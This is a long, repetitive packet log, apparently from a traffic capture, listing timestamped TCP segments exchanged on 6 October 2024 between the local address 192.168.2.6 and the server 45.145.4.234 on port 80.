                                                                                                                                                Oct 6, 2024 22:18:42.402072906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.402090073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.402096033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.402107000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.402115107 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.402124882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.402136087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.402144909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.402158022 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.402184963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.402997017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403009892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403022051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403033972 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.403043032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403053999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.403062105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403074026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403084040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.403094053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403114080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.403137922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.403951883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403964043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403975010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403989077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.403996944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.404007912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404019117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404030085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.404040098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404046059 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.404072046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.404885054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404902935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404913902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404925108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404936075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.404944897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404958010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404963970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.404973030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.404979944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.405009985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.405802011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.405812979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.405824900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.405838966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.405850887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.405858994 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.405869961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.405889034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.405916929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.454751015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.454782009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.454792976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.454885006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.454981089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.454993010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455009937 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455022097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455045938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455250025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455293894 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455394983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455405951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455435038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455451012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455595970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455611944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455624104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455631971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455642939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.455660105 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.455686092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.456073046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.456084013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.456094980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.456120968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.456145048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.458547115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.458745956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.458821058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.458837032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.458851099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.458863020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.458880901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.458910942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.458923101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.458944082 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.458970070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.459157944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.459167957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.459204912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.462148905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462173939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462186098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462212086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.462230921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.462369919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462415934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.462481022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462491989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462503910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462515116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.462523937 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.462557077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.480114937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.480155945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.480168104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.480216980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.480472088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.480484009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.480498075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.480508089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.480518103 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.480540037 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.480879068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.480920076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481040001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481051922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481065035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481076002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481085062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481097937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481115103 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481133938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481621027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481635094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481647968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481658936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481671095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481683016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481693029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481704950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481714010 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481725931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.481736898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.481764078 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.482527971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.482541084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.482553005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.482568979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.482575893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.482589006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.482597113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.482608080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.482615948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.482644081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.483522892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.483536959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.483549118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.483566046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.483577967 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.483592987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.483603001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.483614922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.483623028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.483637094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.483665943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.484371901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.484386921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.484400988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.484416008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.484426022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.484433889 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.484443903 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.484456062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.484464884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.484476089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.484498024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.484518051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.485363960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.485378027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.485389948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.485403061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.485414028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.485431910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.485439062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.485451937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.485462904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.485472918 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.485481977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.485507965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.486318111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.486330986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.486342907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.486356974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.486368895 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.486377954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.486388922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.486397028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.486408949 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.486438990 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.487301111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487314939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487325907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487339973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487348080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.487360954 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.487368107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487380028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487399101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.487410069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487416983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.487427950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.487442970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.487467051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.488099098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488111019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488121986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488135099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488143921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.488156080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488168955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488177061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.488190889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488198042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.488207102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.488214016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.488234043 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.488246918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.489021063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489033937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489046097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489058971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489068985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.489084005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489089966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.489100933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489113092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.489119053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489132881 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.489140034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489161968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.489177942 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.489948988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489962101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489973068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489985943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.489999056 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.490008116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.490020037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.490027905 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.490041018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.490046024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.490056992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.490067005 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.490092993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.490788937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.490801096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.490814924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.490832090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.490849018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.541924000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.541945934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.541959047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542031050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542042971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542056084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542071104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542088985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542100906 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542114973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542149067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542553902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542567015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542587042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542598963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542613983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542619944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542629957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542640924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.542654037 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.542673111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.543149948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.543165922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.543193102 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.543207884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.545401096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545447111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545461893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545469046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.545480967 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.545495987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.545660019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545671940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545684099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545698881 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.545706034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545720100 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.545746088 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.545958042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.545999050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.549060106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.549124956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.549139023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.549151897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.549173117 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.549191952 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.549312115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.549351931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.549402952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.549417019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.549427986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.549438000 CEST806388545.145.4.234192.168.2.6
